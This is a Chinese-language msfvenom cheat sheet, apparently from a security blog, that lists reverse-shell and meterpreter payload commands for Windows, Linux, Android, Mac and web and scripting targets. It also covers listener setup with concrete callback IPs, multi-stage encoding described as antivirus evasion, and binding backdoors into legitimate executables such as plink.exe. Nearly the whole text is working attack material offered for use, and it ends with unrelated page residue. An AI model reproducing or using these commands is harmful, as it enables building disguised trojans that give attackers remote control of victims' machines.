
Android
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=5555 R > shell.apk
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
//linux 后门 需要把文件加权限 chmod +x ./shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
DLL
msfvenom -pwindows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -a x86 -f dll >shell.dll // DLL后门
JAVA
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W >text.jar
C语言
msfvenom -pwindows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f c >shellcode.c
如果要使用编码免杀加上参数
-e x86/shikata_ga_nai
监听利用模块:
use exploit/multi/handler
set PAYLOAD <Payloadname>
set LHOST <LHOSTvalue>
set LPORT <LPORT value>
exploit
如下:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
具体使用:
生成木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=81.71.25.1 lport=7001 --platform win -f exe -o /home/kali/Desktop/54320.exe
监控:
nc -l -p 7001
或者:
msfconsole
use exploit/multi/handler
//set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.33.143
set LPORT 7001
exploit
是一个框架,可以改动
-msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.135 lport=7001 -a x86 --platform win -f exe -o a.exe
-p 指定payload路径
lhost=1.1.1.1 lport=4444 //
-a x86 //操作系统的架构
--platform win //平台,win是windows 平台
-f exe //输出格式,这里是exe格式输出
-o //输出的名字
加密生成shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.33.135 lport=7001 -f raw -e
x86/shikata_ga_nai -i 6 | msfvenom -a x86 --platform windows -e x86/
countdown -i 7 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b 'x00' -f exe -o b.exe
-f raw 以原始的模式输出
-e 接加密编码模块 -i 接数字加密多少次 | ....再次加密
-b ‘xoo’ 把xoo特色字符处理掉
generate -b 'x00xff' -f exe -o /home/1.exe
把后门绑定在其他模板上:-x
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.33.135 lport=7001 -arch x86 --platform win -f exe -o c.exe
直接在linux上运行下面命令生成木马
普通反弹tcp(shell_reverse_tcp):
msfvenom -p windows/shell_reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/5432.exe
利用:可以直接用nc连接,或者msf不用设payload
利用反弹meterpreter_tcp/http:
msfvenom -p windows/meterpreter/reverse_tcp lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54320.exe
使用加密:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b 'x00' -f exe -o /home/kali/Desktop/meter_http_msfjiami_54322
加密绑定文件(有时候文件无法正常使用):
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -b 'x00' -k-x /home/kali/Desktop/key.exe -f exe -o /home/kali/Desktop/54322_key_http_msfjiami.exe
不加密绑定文件:
msfvenom -p windows/meterpreter/reverse_http -k-x /home/kali/Desktop/bing.exe lhost=81.71.25.1 lport=54322 --platform win -f exe -o /home/kali/Desktop/54322_bing.exe
生成源码:
msfvenom -p windows/meterpreter/reverse_http lhost=81.71.25.1 lport=54322 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -f csharp -o /home/kali/Desktop/yuanma.txt
参考:
https://www.cnblogs.com/trevain/p/13675241.html
https://www.cnblogs.com/leeqizhi/p/13029755.html
美国国家AI安全委员会战略报告 美国人尚未意识到人工智能 (AI) 革命将对我们的经济、国家安全和福利产生多大的影响。我们还需要更多地了解和学习 AI 技术的力量和局限性。尽管如此,现在要大力增强 AI 的创新能力来造福美国并防范人工智能被人恶意使用。 在考虑…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论